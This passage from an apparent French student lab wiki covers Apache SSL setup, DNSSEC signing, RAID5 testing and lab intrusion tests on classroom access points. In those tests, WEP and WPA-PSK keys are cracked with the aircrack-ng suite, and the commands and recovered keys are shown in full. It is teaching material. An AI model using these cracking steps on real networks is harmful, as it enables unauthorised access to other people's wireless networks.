Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL.&lt;br /&gt;
Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout GreenArrow.key -out GreenArrow.csr&lt;br /&gt;
Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
If you enter '.', the field will be left blank.&lt;br /&gt;
-----&lt;br /&gt;
Country Name (2 letter code) [AU]:FR&lt;br /&gt;
State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:jjlddelamuerto.space&lt;br /&gt;
Email Address []:&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
GreenArrow.csr	GreenArrow.key&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# cat GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
-----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# apt-get install postfix mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# cp certificat.crt /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
root@GreenArrow:/etc/bind# cp serveur.key /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
root@GreenArrow:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
root@GreenArrow:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-jjlddelamuerto.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available# cat 000-jjlddelamuerto.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.jjlddelamuerto.space&lt;br /&gt;
         ServerAlias jjlddelamuerto.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2# cat ports.conf &lt;br /&gt;
Listen 80&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 stop&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 start&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre  site [https://jjlddelamuerto.space] est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE jjlddelamuerto.space&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE jjlddelamuerto.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# ls&lt;br /&gt;
dsset-jjlddelamuerto.space.	  jjlddelamuerto.space-zsk.key&lt;br /&gt;
jjlddelamuerto.space-ksk.key	  jjlddelamuerto.space-zsk.private&lt;br /&gt;
jjlddelamuerto.space-ksk.private&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite nous signons les zones:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# dnssec-signzone -o jjlddelamuerto.space -k jjlddelamuerto.space-ksk &lt;br /&gt;
../db.jjlddelamuerto.space jjlddelamuerto.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.jjlddelamuerto.space.signed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:jjlddnssec.png]]&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
Cette fois nous essayons de cracker la clef WPA sur cracotte03.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous avons lancé ceci sur le eeePC qui a une vitesse de traitement 5 fois inférieure à celle d'une zabeth environ (environ 5h de traitement). Puis nous obtenons le résultat suivant:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                   Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [04:32:42] 12399908 keys tested (759.63 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399903 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 33 2B 69 DD 95 0A 5A E0 01 22 7E FF 98 DA 99 87 &lt;br /&gt;
                       40 7A CB CC 8A E5 32 9F FE 4E 5C 44 91 38 13 93 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 70 EE 27 96 5B 34 B5 4F 06 A1 F2 B6 A7 16 1E 21 &lt;br /&gt;
                       7A 0B BD F4 13 67 5B 4C ED 30 A9 0D 91 E3 F9 7F &lt;br /&gt;
                       88 E6 12 68 9C 77 4B 48 EB 5E 6A 5A DD 1D D9 08 &lt;br /&gt;
                       36 40 94 7D B4 05 80 B2 60 FA 84 81 50 CE DC 87 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 83 03 24 AC 39 AB 67 E7 7B C4 40 E8 6B 6D 7D 47 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Réalisations ===&lt;br /&gt;
==== Sécurisation des données ====&lt;br /&gt;
&lt;br /&gt;
Nous créons d'abord 3 nouvelles partitions, que nous associons à notre VM en modifiant le fichier GreenArrow.cfg :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-1 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-2 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-3 -v&lt;br /&gt;
&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-1,xvdd,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-2,xvde,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-3,xvdf,w',&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite installer mdadm :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install mdadm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avions une erreur à propos du subsystem. Pour que cela fonctionne, il nous manquait la commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install linux-image-3.16.0-4-amd64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de la machine, nous créons le volume /dev/md0:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 0&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous sauvons cette dernière afin de conserver md0:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mkfs /dev/md0&lt;br /&gt;
root@GreenArrow:~# mkdir /datamd0&lt;br /&gt;
root@GreenArrow:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être surs que la partition soit encore montée après le reboot:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/md0 /datamd0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# vim testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous mettons en commentaire la 2ème partition dans le fichier de conf, puis redémarrons la machine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 13:20:27 2016&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 4&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       2       0        0        2      removed&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# ls /datamd0/&lt;br /&gt;
testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours:&lt;br /&gt;
Suppression de la partition xvdf:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --set-faulty /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --remove /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La partition est bien supprimée:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remet la partition:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --add /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On peut ensuite constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===&amp;gt;.................]  recovery = 18.2% (191112/1047552) finish=0.4min speed=31852K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 20.0% (210764/1047552) finish=0.4min speed=30109K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
